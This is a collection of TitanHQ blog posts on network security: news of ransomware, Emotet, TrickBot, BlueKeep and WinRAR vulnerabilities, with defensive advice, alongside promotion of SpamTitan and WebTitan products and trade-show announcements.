Our network security news section contains a range of articles relating to securing networks and blocking cyberattacks, ransomware and malware downloads. This section also features articles on recent network security breaches, alerting organizations to the latest attack trends being used by cybercriminals.
Layered cybersecurity defenses are essential given the increase in hacking incidents and the explosion in ransomware and malware variants over the past two years. Organizations can tackle the threat by investing in new security defenses such as next generation firewalls, end point protection systems, web filtering solutions and advanced anti-malware and antivirus defenses.
While much investment goes on tried and tested solutions that have been highly effective in the past, many cybersecurity solutions – antivirus software – are not as effective as they once were. In order to maintain pace with hackers and cybercriminals and get ahead of the curve, organizations should consider implementing a wide range of new cybersecurity solutions to block network intrusions, prevent data breaches and improve protection against the latest malware and ransomware threats.
This category contains information and advice on alternative network security solutions that can be adopted to improve network security and ensure networks are not infiltrated by hackers and infected with malicious software.
The dangers of ransomware attacks have been made abundantly clear to more than 5,000 patients in California whose medical records have been permanently lost as a result of a ransomware attack on their healthcare provider.
Simi Valley, CA-based Wood Ranch Medical experienced the attack on August 10, 2019 which saw ransomware deployed and executed on its servers which contained the medical records of 5,835 patients. The attack caused permanent damage to computer systems, and since backup copies of patient records were also encrypted, those records have been permanently lost. It is unclear how much the attackers demanded as payment for the keys and whether those keys would have worked had the ransom been paid.
Without patient records and faced with the prospect of having to totally rebuild the medical practice from scratch, the decision was taken to permanently close the business. Patients have been forced to find alternative healthcare providers and no longer have access to their medical records.
This is the second healthcare provider in the United States that has been forced out of business due to a ransomware attack. Brookside ENT and Hearing Center in Battle Creek, Michigan also closed its practice this year as a result of a ransomware attack. In that case, the practice owners refused to pay the ransom demand and patient records were permanently encrypted. The practice owners decided it was not possible to rebuild the practice from scratch and announced their early retirement.
It is unclear exactly how the ransomware was installed in each of these incidents, so it is not possible to determine what defenses could have been improved to prevent the attacks. However, in both cases, recovery of files from backups was not possible.
The purpose of a backup is to ensure that in the event of disaster, data will be recoverable. File recovery may be time consuming and downtime due to the attack likely to be expensive, but data will not be permanently lost.
In order to ensure file recovery is possible, backups must be tested. Files may be corrupted during the backup process and data restoration may not be possible. If backups are not tested to make sure files can be recovered, it will not be possible to guarantee file recovery in the event of disaster.
These incidents also highlight another fundamental rule of backing up. NEVER store the only copy of a backup on a networked or internet-connected computer.
In the event of ransomware attack, it is highly likely that backup copies on networked devices will be encrypted along with shadow volume copies. Ransomware encrypts these files to make sure the only way of recovering data is paying the ransom.
Even paying a ransom comes with no guarantee that data will be recoverable. Files may be corrupted through the encryption/decryption process – some data loss is inevitable – and the attackers may not be able to supply valid keys to decrypt files.
A good backup approach to adopt to prevent disasters such as these is a 3-2-1 strategy. 3 backups should be created, which should be stored on 2 different media, with 1 copy stored securely off site on a device that is not networked or connected to the internet.
After a quiet summer, the Emotet botnet is back in action. The threat actors behind Emotet are sending hundreds of thousands of malicious spam emails spreading the Emotet Trojan via malicious Word documents.
Emotet first appeared in 2014 and was initially a banking Trojan used to obtain credentials to online bank accounts. The stolen credentials are used to make fraudulent wire transfers and empty business accounts. Over the years the Trojan has evolved considerably, with new modules being added to give the malware a host of new features. Emotet is also polymorphic, which means it can change itself each time it is downloaded to avoid being detected by signature-based anti-malware solutions. Up until the start of 2019, more than 750 variants of Emotet had been detected.
The latest iteration of Emotet is capable of stealing banking credentials and other types of information. It is also capable of downloading other malware variants, which has led to security researchers naming it ‘triple-threat malware,’ as it has been used recently to download the TrickBot Trojan and Ryuk ransomware. These three malware threats along with the scale of the operation make Emotet one of the most dangerous threats faced by businesses. It is arguably the costliest and most destructive botnet ever seen.
Last summer, Emotet activity was so high and the threat so severe that the Department of Homeland Security issued an alert to all businesses in July 2018 warning them of the threat. That warning was mirrored by the UK National Cyber Security Center which published its own warning about the malware in September 2018. Activity remained high well into 2019, but suddenly stopped at the start of June when command and control server activity fell to next to nothing.
The hiatus in activity was only brief. Researchers at Cofense Labs discovered its command and control servers had been activated again in late August and a massive spamming campaign commenced on September 16 using bots in Germany. The campaign was initially focused on businesses in the United States, Germany, and United Kingdom but the campaign has now spread to Austria, Italy, Poland, Spain, and Switzerland.
After being downloaded, Emotet spreads laterally and infects as many devices as possible on the network. Email accounts on infected machines are hijacked and used to send further spam emails to all contacts in the account. Finally the malware downloader module is used to a secondary and often tertiary malware variant.
The latest campaign uses Word documents containing malicious macros, which launch PowerShell scripts that fetch the Emotet Trojan from a variety of different compromised websites, many of which are running the WordPress CMS.
The campaign uses a variety of lures including invoices, payment remittance advice, and statements, the details of which are contained in Word documents that require content to be enabled to view the document content.
Upon opening the document, the user is requested to accept the Office 365 license agreement. Failure to enable content, so the document claims, will result in Microsoft Word features being disabled.
This campaign includes personalized subject lines including the recipients name to increase the likelihood of a user taking the requested action. Genuine email thread are also hijacked to make it appear that the user has already been communicating with the sender of the email. Around a quarter of attacks use hijacked email threads. Data from Cofense indicates emails are being sent from 3,362 hijacked email accounts from 1,875 domains.
It is currently unclear whether Ryuk ransomware is being distributed in this campaign. Several researchers have confirmed that TrickBot is being downloaded as a secondary payload.
The key to blocking attacks with polymorphic malware is to implement layered defenses, including an advanced spam filtering solution, anti-virus software, and web filter. It is also important to ensure that the staff is made aware of the threat of attack and the types of email that are being used to spread the Trojan.
This fall, TitanHQ will be attending several Managed Service Provider (MSP) events and trade shows throughout Europe and the United States.
TitanHQ has been developing innovative cybersecurity solutions for MSPs for more than two decades and all solutions have been created with MSPs firmly in mind. By involving MSPs in the design process, TitanHQ has been able to ensure that its products incorporate features to make life easier for MSPs, such as easy integration into MSPs management systems through the use of APIs to features rarely found in cybersecurity products – such as full white label versions ready for MSP branding and the ability to host the solutions within MSPs own environments.
Trade shows give the TitanHQ team the opportunity to meet face to face with prospective clients to discuss their email and web security needs and get face to face feedback from current customers that have already integrated TitanHQ products into their technology stacks.
The TitanHQ team kicked off the fall schedule of trade shows on September 12 at the Taylor Business Group BIG 2019 Conference at the Westin Hotel in Chicago, where members got to meet the TitanHQ team to discuss the new TitanShield program and discover how TitanHQ products can improve security for their clients while saving MSPs time and money.
At the same time, TitanHQ was at the CloudSec Europe 2019 Conference in London demonstrating WebTitan Cloud, SpamTitan Cloud, and ArcTitan to MSPs and cloud service providers.
If you were unable to attend either of these two events or did not get the chance to meet with the team, all is not lost. The fall schedule has only just commenced and there are still plenty of opportunities to meet the team to discuss your requirements and find out how TitanHQ products can meet and exceed your expectations.
Trade Events Attended by TitanHQ – Autumn, 2019
September 17, 2019
September 18, 2019
October 6-10, 2019
October 7-8, 2019
CompTIA EMEA Show
October 16-17, 2019
Canalys Cybersecurity Forum
October 21-23, 2019
October 30, 2019
MSH Summit North
October 30, 2019
IT Nation Evolve (HTG 4)
October 30, 2019
IT Nation Connect
November 5-7, 2019
If you plan on attending any of the above events this fall, be sure to come and visit the TitanHQ team and feel free to reach out ahead of the events for further information.
Rocco Donnino, Executive Vice President-Strategic Alliances, LinkedIn
Eddie Monaghan, MSP Alliance Manager, LinkedIn
Marc Ludden, MSP Alliance Manager, LinkedIn
Dryden Geary, Marketing Director
TitanHQ has announced it has entered not a new partnership with one of the United Kingdom’s leading Managed Service Providers (MSPs), OneStopIT.
For more than 16 years, OneStopIT has been helping small to medium sized businesses (SMBs) implement enterprise-class technology solutions. The Edinburgh-based MSP is focused on providing process-driven IT solutions to growing organizations at an affordable price.
Through the company’s dealing with UK businesses it has become clear that one of the biggest problem areas is phishing. Phishing attacks on UK businesses are now occurring at record pace and those attacks are costing businesses dearly.
UK businesses need advanced, enterprise-level cybersecurity solutions, but at an affordable SMB-friendly price. To improve protection against phishing and malware attacks, OneStopIT turned to TitanHQ.
TitanHQ has developed powerful cloud-based solutions for the SMB marketplace that incorporate enterprise-grade security features, but at a price that is affordable for even the smallest business. These solutions have been developed to be delivered by MSPs and can be easily incorporated into MSP auto-provisioning, billing, and management systems.
Under the new partnership, OneStopIT will be offering its customers SpamTItan-powered advanced email security and anti-phishing protection, WebTitan-powered DNS-based web filtering, and an ArcTitan-powered email archiving service.
All three solutions have been seamlessly integrated into OneStopIT’s security stack and are now being used to better protect its customers from today’s advanced and sophisticated cyber threats.
“ The proliferation of phishing threats across Office 365 is a real problem for SME’s in the UK and we’re partnering with a key vendor in this space to protect our customers and also give them the OneStopIT premium service they are used to,” said Ally Hollins-Kirk, CEO of OneStopIT.
The largest managed service provider conference of 2019 will be taking place in San Diego on 17-19 June.
DattoCon is the premier conference for MSPs, bringing together a plethora of vendors and industry experts to help MSPs learn business building secrets, gain invaluable product insights, and learn technical best practices. The networking and learning opportunities at DattoCon are second to none. DattoCon19 is certainly an event not to be missed.
TitanHQ is a Datto Select Vendor and a proud sponsor of DattoCon19. TitanHQ has developed cybersecurity solutions to exactly meet the needs of MSPs. All solutions area easy to implement and maintain and can be integrated into MSP’s existing systems via a suite of APIs. TitanHQ provides the web security layer to Datto DNA and D200 boxes and is the only third-party security company trusted to work with Datto.
The TitanHQ team will be on hand at the conference to discuss your email and web security needs and will offer practical advice to help you better serve the needs of your customers and get the very most out of TitanHQ solutions.
Visitors to the TitanHQ stand (booth 23) will have the opportunity to learn about TitanHQ’s exclusive TitanShield Program for MSPs. Through the TitanShield program, members have access to SpamTitan email security and phishing protection; the WebTitan DNS filter; and the ArcTitan email archiving solution. Around 2,000 MSPs have already signed up to the program and are using TitanHQ solutions to protect their clients.
If you currently use Cisco Umbrella to provide web and malware protection, you may be paying far more for security than is necessary and could well be struggling with product support. Be sure to speak to the team about the savings from switching and the support provided by TitanHQ. A visit will also be useful for MSPs that are currently supporting Office 365, as the team will explain how spam, phishing and malware protection can be enhanced.
TitanHQ Executive Vice President-Strategic Alliances, Rocco Donnino, will be on the panel for the new, Datto Select Avendors event on Monday. The event runs from 3PM to 4PM and brings together experts from several select companies who will help solve some of the epic problems faced by MSPs today.
Additional Benefits at DattoCon19
New TitanHQ customers benefit from special show pricing.
A daily raffle for a free bottle of vintage Irish whiskey.
Two DattoCon19 parties: TitanHQ and BVOIP are sponsoring a GasLamp District Takeover on Monday 6/17 and Wed, 6/19.
DattoCon19 will be taking place in San Diego, California on June 17-19, 2019
If you are not yet registered for the event you can do so here.
TitanHQ will be at booth 23
The global user review website, G2, is the go-to place to find reviews of business software and services. Unlike many other review websites, G2 gives users of the software and services the opportunity to provide their feedback on how the products perform. Millions of businesses use the website to make smarter buying decisions and select the best products and services to meet their needs.
This year, for the first time, G2 has launched a new Best Software Companies in EMEA list. To produce the list, G2 used the reviews of more than 66,000 users of the products of more than 900 companies. To be selected as one of the best companies is only possible if users of products and services have given their endorsement.
“G2’s ever-expanding breadth and depth of product, review, and traffic coverage provide over 5 million data points to help buyers navigate the complex world of digital transformation”, said G2 CEO Godard Abel. “In our Best Software Companies in EMEA list, we leverage this data to identify the companies our users tell us are best helping them reach their potential”.
TitanHQ has developed a suite of advanced cybersecurity solutions to keep businesses protected from email and web-based threats and help MSPs serving that market effortlessly provide managed cybersecurity services to their clients.
“TitanHQ earned its place on the list thanks to the value our customers place on the uncompromised security and real-time threat detection we provide,” said Ronan Kavanagh, CEO, TitanHQ. “The overwhelmingly positive feedback from on G2 Crowd is indicative of our commitment to ensuring the highest levels of customer success.”
The use of ransomware to attack businesses continued to decline throughout 2018 after extensive use of the file-encrypting malware by cybercriminals in 2016 and 2017. In 2018, ransomware fell out of favor with cybercriminals, who turned to other forms of cybercrime to make money.
However, ransomware is seeing something of a resurgence in 2019. The latest Breach Insights Report from Beazley Breach Response Services shows ransomware attacks are increasing once again. In the first quarter of 2019, ransomware attack notifications from its clients increased by 105% from Q1, 2018. Ransom demands are also increasing.
The rise in attacks has continued in Q2. Attacks using MegaCortex ransomware surged in late April. The ransomware variant was first identified in January and was only used in a handful of attacks in the following three months, but in the last week in April, 47 confirmed attacks were reported.
Dharma ransomware attacks have similarly increased. According to Malwarebytes, the past two months have seen a 148% increase in attacks. The threat actors behind Dharma ransomware are now using a variety of methods to distribute their ransomware payload.
The most common method of distribution is phishing emails. Emails contain embedded hyperlinks that direct users to a malicious website where the ransomware payload is downloaded. Email attachments containing malicious scripts are also used to download the ransomware payload.
Attacks are also taking place via remote desktop protocol over TCP port 3389. Brute force attacks are conducted to gain access to a device then ransomware is deployed. Dharma ransomware has also been identified in fake antivirus software programs which are pushed via a variety of websites. Users are tricked into downloading fake AV software after receiving a fake alert about a malware infection that has been detected on the user’s device.
Ransomware has also been used in conjunction with other malware such as Emotet. Emotet was once a banking Trojan but has since morphed into a botnet, capable of stealing login credentials, propagating itself via email on an infected device, and is capable of downloading other malware payloads. Emotet has been used to distribute Ryuk ransomware.
There have been upticks in attacks using other ransomware variants and the popularity of ransomware continues to grow, with some industries targeted more than others. Healthcare organizations are an attractive target as access to patient data is critical for providing medical services. There is a higher probability of ransom demands being paid due to reliance on patient data.
A recent report from Recorded Future has confirmed that attacks on towns, cities, and local government systems are soaring. Its study confirmed that there were 169 attacks on county, city, or state government systems and police and sheriffs’ offices since 2013. There were 38 ransomware attacks in 2017, 53 in 2018, and 22 attacks have already occurred in 2019 and the year is not yet halfway through.
Akron, OH; Albany, NY; Jackson County and Cartersville, GA; and Lynn, MA, have all been attacked this year and the city of Baltimore, MA, has been struggling to recover from its attack for the past two weeks with many city services still disrupted.
The rise in attacks is understandable. The potential rewards from a successful attack are high, many victims have no alternative but to pay, and thanks to ransomware-as-a-service, attacks are easy to pull off and require little in the way of skill.
As long as the attacks continue to be profitable, they will continue. What businesses need to do is to make it much harder for the attacks to succeed and to ensure that if disaster does strike, recovery is possible without having to pay a ransom.
Recovery depends on viable backups of all critical files being available. That means regular backups must be made, those backups need to be tested to make sure files can be restored, and copies need to be stored securely where they cannot also be encrypted.
Remote Desktop Protocol is a weak point that is commonly exploited. If RDP is not required, it should be disabled. If disabling RDP is not an option, strong, complex passwords should be used and access should only be possible using a VPN.
To block web-based attacks, consider implementing a web filtering solution such as WebTitan which prevents users from visiting known malicious websites and downloading executable files types.
One of the primary methods of delivering ransomware is spam and phishing emails. An advanced spam filtering solution should be implemented to block malicious emails and ensure they are not delivered to end users’ inboxes. SpamTitan now incorporates a sandbox, which allows suspicious files to be executed in a secure environment where activities of the files can be safely analyzed for malicious actions. SpamTitan also scans outgoing mail for signs of infection with Emotet.
While these technical controls are important, you should not forget end users. By providing security awareness training and teaching end users how to recognize potential threats, they can be turned into a strong last line of defense.
Fortunately, with layered defenses you can make it much harder for ransomware attacks to succeed and can avoid becoming yet another ransomware statistic.
Shade ransomware was first identified by security researchers in 2014, when it was primarily being used in attacks on Russian businesses; however the threat actors behind this ransomware variant have broadened their horizons and attacks are now being conducted around the world. The United States is now the most attacked country followed by Japan, India, Thailand, and Canada. Russia has now fallen from top spot to seventh.
Shade ransomware, like many ransomware variants, is primarily spread via email. Emails are sent to businesses which appear at first glance to be invoices or bills. The emails contain links to websites hosting malicious files which are downloaded to the user’s device. A variant of this method uses a PDF attachment which contains a link inside which must be clicked to download a fake invoice or bill.
An analysis of the latest campaigns was recently conducted by Palo Alto Networks Unit 42 team. That analysis revealed the attackers are concentrating their attacks on high-tech companies, retailers, wholesalers, telecommunications, and educational institutions and the threat actors behind the campaigns have been highly active in 2019.
Since Shade ransomware is most commonly spread via spam email, to reduce the risk of an attack, businesses should implement an advanced email gateway solution that is capable of identifying and blocking the malspam emails that ultimately deliver Shade ransomware.
SpamTitan protects businesses from Shade ransomware and other email-based malware attacks. SpamTitan includes dual antivirus engines to detect malicious files attached to emails and scans the content of messages and subjects them to a Bayesian analysis and heuristics to identify signatures of spam and malicious messages.
The solution now incorporates a Bitdefender-powered sandbox feature which allows files to be opened in a safe and secure environment where they can be analyzed for malicious activity. The solution also allows users to block attachments commonly used to deliver malware, such as zip files and executable files such as .exe and .js.
These and other protection mechanisms help to ensure that only legitimate emails are delivered and malicious messages are prevented from being delivered to end users’ inboxes.
If you want to protect your business against ransomware and malware attacks, contact TitanHQ today to find out more about SpamTitan and take the first step towards improving your security posture.
A critical Windows vulnerability has been identified which could be exploited in a WannaCry-style malware attack. The vulnerability is pre-authentication and requires no user interaction to exploit, as such it is wormable. A patch was issued by Microsoft on May 14, 2019 to correct the flaw. The patch should be applied immediately to prevent the flaw from being exploited.
A remote attacker could exploit the flaw to deliver malware to a vulnerable device and, by incorporating the exploit into the malware, move laterally and infect all vulnerable devices on the network.
The vulnerability, tracked as CVE-2019-0708, is in Remote Desktop Services (previously called Terminal Services) and requires a relatively low level of skill to exploit. To exploit the flaw, an attacker would need to send a specially crafted request to the Remote Desktop Service on a targeted device via RDP. Once exploited, an attacker could download malware and install other programs, view, change, or delete data, create new user accounts with admin privileges, and take full control of a vulnerable device. The vulnerability has been assigned a CVSS v3 base score of 9.8 out of 10.
Microsoft has incorporated security protections into the latest Windows versions, so Windows 8 and Windows 10 users are unaffected. However, earlier versions of Windows contain the vulnerability.
Patches have been released for all vulnerable Windows versions, including Windows XP and Windows 2003, both of which have reached end of life and are no longer supported, as was the case with the Windows Server Message Block (SMB) vulnerability that was exploited by WannaCry.
Affected Windows versions are:
Windows Server 2008 R2
Windows Server 2008
Businesses running machines with the above operating systems should test the patch and apply it as soon as possible. In the meantime, a workaround should be implemented to prevent the flaw from being exploited.
The workaround requires TCP port 3389 to be blocked on the firewall and for Network Level Authentication (NLA) to be enabled on all systems running vulnerable Windows versions. If NLA is enabled, before the flaw can be exploited, an attacker would first need to authenticate to remote Desktop Services using a valid account. While the workaround will reduce the risk of exploitation of the vulnerability, it is not a replacement for the patch, which should still be applied as soon as possible. Businesses should also disable Remote Desktop Services if they are not essential and RDP should not be exposed to the internet.
Microsoft has warned that the failure to mitigate the vulnerability, either by applying the patch or using the workaround, could result in another global attack on the scale of WannaCry. Such an attack is extremely likely. When patches are released to address critical flaws, it doesn’t take long for them to be reverse engineered and for exploits to be crafted. Such a high severity flaw is likely to be exploited quickly. It may only take a few days before the first attacks are conducted.
TitanHQ, the leading provider of spam filtering, web filtering, and email archiving solutions to SMBs and managed service providers (MSPs) has announced a new partner program has been launched: TitanShield.
The aim of the TitanShield Partner Program is to provide MSPs, cloud distributors, OEM partners, Wi-Fi providers, and Technology Alliance partners with all the tools and support they need to start offering TitanHQ solutions to their clients and to provide continued support.
The launch of the new program coincides with TitanHQ’s 20-year anniversary. For the past two decades, TitanHQ has been developing innovative cybersecurity solutions for SMBs and MSPs that serve the SMB market. The company started by developing anti-spam technologies for businesses in Ireland and has since grown into an award-winning global provider of cybersecurity solutions.
Over the course of the past year, TitanHQ has been working closely with partners to make it as easy as possible for them to sell, onboard, deliver, and managed advanced network security solutions directly to their client base. In fact, in the past 9 months, as a result of those efforts, TitanHQ has increased its partner base by 40%.
In addition to providing cutting edge cybersecurity solutions to protect against email and web-based attacks and meet compliance requirements, TitanHQ offers partners flexible pricing models, competitive margins, and a wealth of sales and technical resources to drive revenue growth.
Under the new partner program, all qualified partners will be assigned a dedicated account manager, a support team, and engineers. Partners also benefit from a full range of APIs that will enable them to incorporate TitanHQ products into their backend provisioning and management systems and will be provided with extensive sales enablement and marketing support, including lead generation resources.
“Our new TitanShield partner program allows us to separate partners into their specific areas so that we can make sure they are receiving best practices, simple pricing models and focused information for the markets and customers they serve,” explained TitanHQ Executive VP of Strategic Alliances, Rocco Donnino “Our program takes a unique and strategic approach for our partners and can be customized to fit all business models.”
MSPs and cloud providers who have not yet started offering TitanHQ solutions to their clients can find out more about the TitanShield program by emailing the team at email@example.com
Monday April 15 is Tax Day in the United States – the deadline for submitting 2018 tax returns. Each year in the run up to Tax Day, cybercriminals step up their efforts to obtain users’ tax credentials. In the past few weeks, many tax-related phishing scams have been detected which attempt to install information stealing malware.
One of the main aims of these campaigns is to obtain tax credentials. These are subsequently used to file fraudulent tax returns with the IRS. Tax is refunded to accounts controlled by the attackers, checks are redirected, and a range of other methods are used to obtain the payments.
Attacks on tax professionals are commonplace. If access can be gained to a tax professional’s computer, the tax credentials of clients can be stolen, and fraudulent tax returns can be filed in their names. A single successful attack on a tax professional can see the attacker obtain many thousands of dollars in tax rebates.
There has been the usual high level of tax-related phishing scams during the 2019 tax season and businesses of all types have been targeted. It is not only tax credentials that cybercriminals are after. Many tax-themed phishing scams have been conducted which attempt to install malware and ransomware such as the TrickBot banking Trojan.
The TrickBot banking Trojan is a powerful malware variant which, once installed, can give an attacker full control of an infected computer. The malware is primarily an information stealer. A successful installation on one business computer can allow the attackers to move laterally and spread the malware across the whole network.
The primary purpose of the TrickBot trojan is to steal banking credentials which can be used to make fraudulent wire transfers: however, TrickBot is regularly updated with new features. In addition to stealing banking credentials, the malware can steal VNC. RDP, and PuTTY credentials.
The threat actors behind TrickBot are highly organized and well resourced. More than 2,400 command and control servers are used by the cybercriminal gang and that number continues to grow.
The three new TrickBot malware campaigns were detected since late January by IBM X-Force researchers. Spam email messages are carefully crafted to appear legitimate and look innocuous to business users and appear to have been sent by well-known accounting and payroll firms such as ADP and Paychex.
Spoofed email addresses are commonly used, although in these campaigns, the attackers have used domain squatting. They have registered domains that are very similar to those used by the accounting firms. The domains have transposed letters and slight misspellings to make the email appear to have been sent from a legitimate source. The domains can be highly convincing and, in some cases, are extremely difficult to identify as fake.
The emails are well written and claim to include tax billing records, which are included as attached spreadsheets. The spreadsheets contain malicious macros which, if allowed to run, will download the TrickBot Trojan.
To prevent attacks, several steps should be taken. Macros should be disabled by default on all devices. Prompt patching is required to keep all software and operating systems up to date to prevent vulnerabilities from being exploited.
End users should receive security awareness training and should be taught cybersecurity best practices and how to identify phishing emails. An advanced spam and anti-phishing solution should also be implemented to ensure phishing emails are identified and prevented from reaching end users inboxes. Further, all IoCs and IPs known to be associated with the threat actors should be blocked through spam filtering solutions, firewalls, and web gateways.
The latter is made easy with SpamTitan and WebTitan – TitanHQ’s anti-phishing and web filtering solutions for SMBs.
Current users of the SpamTitan email security solution and SMBs and MSPs that are considering implementing SpamTitan or offering it to their clients are invited to join a webinar in which TitanHQ will explains the exciting new features that have recently been incorporated into the anti-phishing and anti-spam solution.
SpamTitan has recently received a major update that has seen the incorporation of DMARC email authentication to better protect users from email impersonation attacks and the addition of a new Bitdefender-powered sandbox. The sandbox allows users to safely assess email attachments for malicious actions, to better protect them against zero-day malware and other malicious software delivered via email.
The webinar will explain these and other features of SpamTitan in detail and the benefits they offer to customers, including how they better protect SMBs and SMEs from phishing, spear phishing, spoofing, ransomware, malware, and zero-day attacks.
The webinar will also explain why SpamTitan is the leading email security solution for managed service providers serving the SMB and SME market and how the solution can help to enhance security for their clients and can easily be slotted into their service stacks.
The webinar will be taking place on Thursday April 4, 2019 at 12pm, EST and will last approximately 30 minutes.
This week, TitanHQ has rolled out two new features for its award-winning email security solution SpamTitan: Sandboxing and DMARC email authentication.
TitanHQ developed the technology behind its email security solution more than 20 years ago and over the past two decades SpamTitan has received many updates to improve features for end users and increase detection rates.
SpamTitan already blocks more than 99.9% of spam and malicious emails to prevent threats from reaching end users’ inboxes. The level of protection SpamTitan provides against email attacks has made it the gold standard in email security for the SMB market and managed service providers serving SMBs.
In order to provide even greater protection against increasingly sophisticated email threats, TitanHQ added a new sandboxing feature. The next-generation sandboxing feature, powered by Bitdefender, provides SpamTitan customers with a safe environment to run in-depth analyses of suspicious programs and files that have been delivered via email.
New SpamTitan Sandboxing Service
The sandbox is a powerful virtual environment totally separate from other systems. When programs are run in the sandbox, they behave as they would on an ordinary endpoint and can be assessed for suspicious behavior and malicious actions without causing harm.
Prior to being sent to the sandbox, files are first analyzed using SpamTitan’s anti-malware technologies. Only files that require further analysis make it to the sandbox where they are safely detonated. Tactics used by malware to evade detection and avoid analysis are logged and flagged. Purpose-built, advanced machine learning algorithms they assess the files and check their actions against an extensive array of known threats from a range on online repositories in a matter of minutes.
If the file is confirmed as benign, it can be released. If the file is determined to be malicious, the sandboxing service automatically sends a report to the Bitdefender’s Global Protective Network and all further instances of the threat will then be blocked globally to ensure the file does not need to be analysed again.
The sandbox provides advanced protection against zero-day exploits, polymorphic threats, APTs, malicious URLs, new malware samples that have yet to be identified as malicious, and new threats that have been developed for undetectable targeted attacks.
Incorporation of this feature into SpamTitan gives customers advanced emulation-based malware analysis capabilities without having to purchase a separate sandboxing solution and ensures customers are protected against rapidly evolving advanced threats.
DMARC Email Authentication Added to SpamTitan
Email spoofing is the term given to the use of a forged sender address. Email spoofing is used to increase the likelihood of an email being delivered and opened by an end user. The email address of a known contact, well known company, or government organization is usually spoofed to abuse trust in that individual, brand, or organization.
DMARC authentication is now essential for all businesses and is a powerful control to prevent spoofing attacks. DMARC is used to check email headers to provide further information about the true sender of an email. Through DMARC, the message is authenticated as having been sent from the organization that owns the domain. If authentication fails, the message is rejected.
While SPF provides a certain degree of protection against email spoofing, DMARC is far more dependable. SpamTitan now incorporates DMARC authentication to provide even greater protection against email spoofing attacks.
Both of these new features have been added in the latest update to SpamTitan and are available to users at no extra cost.
“We have listened to requests from customers to have new features added to SpamTitan, and by far the most requested improvements are anti-spoofing technology and sandboxing,” said Ronan Kavanagh, CEO, TitanHQ. “I’m delighted to say that both of these new features have now been added to provide enhanced security for customers at no extra cost.”
It doesn’t take long after the release of a patch for hackers to take advantage, especially when the vulnerability potentially impacts 500 million users. It is therefore not surprising that at least one hacker is taking advantage of a recently disclosed WinRAR vulnerability.
Oftentimes, vulnerabilities are found in certain versions of software, but this vulnerability affects all WinRAR users and dates back 19 years. The WinRAR vulnerability was identified by researchers at Check Point. WinRAR was alerted and confirmed the vulnerability existed, and promptly issued an updated version of the file compression tool with the vulnerability removed. Details of the vulnerability were disclosed in a Check Point blog post on February 20, 2019.
The WinRAR vulnerability in question was present in a third-party DLL file which was included in WinRAR to allow ACE archive files to be uncompressed. The researchers found that by renaming a .rar archive to make it appear that the compressed file was an ACE archive, it was possible to extract a malicious file into the startup folder unbeknown to the user. That file would then run on boot, potentially giving an attacker full control of the device. The malicious file would continue to load on startup until discovered and removed.
All an attacker would need to do to exploit the WinRAR vulnerability is to convince a user to open a specially crafted .rar archive file attached to an email. Compressed files are often used in malspam campaigns to hide malicious executable files. Since .rar and .zip files are commonly used by businesses to send large files via email, they are likely to be recognized and may be opened by end users.
In this case, if the archive contents are extracted, the user would likely be unaware that anything untoward had happened, as the executable is loaded into the startup folder without giving any indication the file has been extracted. Due to the location of extraction, no further actions are required by the user.
In this case, the executable installs a backdoor, although only if the user has User Account Control (UAC) disabled. That said, this is unlikely to be the only campaign exploiting the WinRAR vulnerability. Other threat actors may develop a way to exploit the vulnerability for all users that have yet to update to the latest WinRAR version.
Many users will have WinRAR installed on their computer but will rarely use the program, so may not be aware that there is an update available. It is possible that a large percentage of users with the program installed have yet to update to the latest version and are vulnerable to attack.
This campaign illustrates just how important it is to patch promptly. As soon as a patch is released for a popular software program it is only a matter of time before that vulnerability is exploited, even just a few days.
Patching all devices in use in an organization can take time. It is therefore important to make sure that all employees receive security awareness training and are taught email security best practices and how to identify potentially malicious emails.
Unfortunately, social engineering techniques can be highly convincing, and many users may be fooled into opening email attachments, especially when the attacker spoofs the sender’s email address and the email appears to come from a known individual. It is therefore essential to have an advanced spam filtering solution in place that is capable of detecting malicious attachments at source, including malicious files hidden inside compressed files, and stop the messages from being delivered to inboxes.
A year-old vulnerability in the Connectwise plugin for Kaseya VSA has been exploited in a series of MSP ransomware attacks over the past two weeks. The latest campaign is one of several cyberattacks targeting MSPs in recent months that abuse trusted relationships between MSPs and their clients. The aim of the attacks is to gain access to MSP systems in order to attack their clients.
MSPs are trusted by SMBs to improve security, identify and correct vulnerabilities, and prevent costly cyberattacks. However, if MSPs do not follow cybersecurity best practices such as ensuring patches and software updates are applied on their own systems, they place their clients at risk.
MSP ransomware attacks such as these have potential to cause considerable damage to an MSP’s reputation, could easily result in loss of clients, and also possible legal action.
On MSP Reddit poster explained that cybercriminals recently exploited a vulnerability to gain access to clients’ systems and had installed ransomware on approximately 80% of client machines. Other attacks have also succeeded in encrypting files on client networks.
It is not always possible to update plugins, apply patches, and perform software updates instantly, but in this case the vulnerability was identified in November 2017. A proof of concept exploit was published, and an updated plugin was rapidly released by Connectwise to correct the flaw. Despite this, 126 MSPs are still using the out of date and vulnerable plugin according to a recent Kaseya security warning.
The Connectwise plugin for Kaseya VSA contained a flaw – CVE-2017-18362 – that allowed commands to be run on a Kaseya VSA server without the need for authentication due to an error within the Connectwise API. By exploiting the vulnerability, an attacker would be able to gain access to the Kaseya VSA server and conduct attacks on MSP clients. In this case, GandCrab ransomware was installed.
The group behind this campaign may not be the only criminal gang to attempt to exploit the vulnerability. It is possible that some MSPs who failed to update the plugin may have also had their server compromised and less conspicuous malware may have been installed.
All MSPs that use Connectwise and have the plugin installed on their on-premise server should ensure the latest version of the plugin is installed. Connectwise has made a tool available to users that will conduct a scan to determine if the vulnerable plugin is in use. It is also recommended to disconnect the VSA server from the internet and to perform an audit to determine if the server has been compromised.
Thanks to advanced cybersecurity defenses, many of which are provided by MSPs to their clients, it is becoming harder for cybercriminals to use standard tactics such as mass spam emails to gain access to business networks. As the past few months have shown, cybercriminals are now targeting MSPs to gain access to their clients’ systems. It is therefore essentials that MSPs ensure they scan for vulnerabilities on their own systems to identify potential weaknesses before they are exploited by hackers.
The 2019 Cybersecurity Survey conducted by the Healthcare Information and Management Systems Society (HIMSS) has highlighted healthcare email security weaknesses and the seriousness of the threat of phishing attacks.
HIMSS conducts the survey each year to identify attack trends, security weaknesses, and areas where healthcare organizations need to improve their cybersecurity defenses. This year’s survey confirmed that phishing remains the number one threat faced by healthcare organizations and the extent that email is involved in healthcare data breaches.
This year’s study was conducted on 166 healthcare IT leaders between November and December 2018. Respondents were asked questions about data breaches and security incidents they had experienced in the past 12 months, the causes of those breaches, and other cybersecurity matters.
Phishing attacks are pervasive in healthcare and a universal problem for healthcare providers and health plans of all sizes. 69% of significant security incidents at hospitals in the past 12 months used email as the initial point of compromise. Overall, across all healthcare organizations, email was involved in 59% of significant security incidents.
